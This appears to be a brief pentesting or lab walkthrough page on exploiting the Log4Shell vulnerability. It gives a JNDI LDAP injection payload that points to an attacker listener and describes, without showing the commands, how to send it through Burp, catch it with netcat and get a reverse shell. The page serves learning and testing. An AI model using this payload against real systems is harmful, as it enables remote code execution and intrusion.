πŸ¦ͺLog4Shell

Check this article for more info To check for Log4Shell exploit :

${jndi:ldap://10.8.0.178:4444/a}

Then url encode it and send through burp after intercepting:

Listening on nc:

We get some weird characters back.

Then we can use a log4j-shell Download java and execute

Then send the payload:

Sending the url encoded payload in burpsuite.

Now we get a shell back:

Last updated

Was this helpful?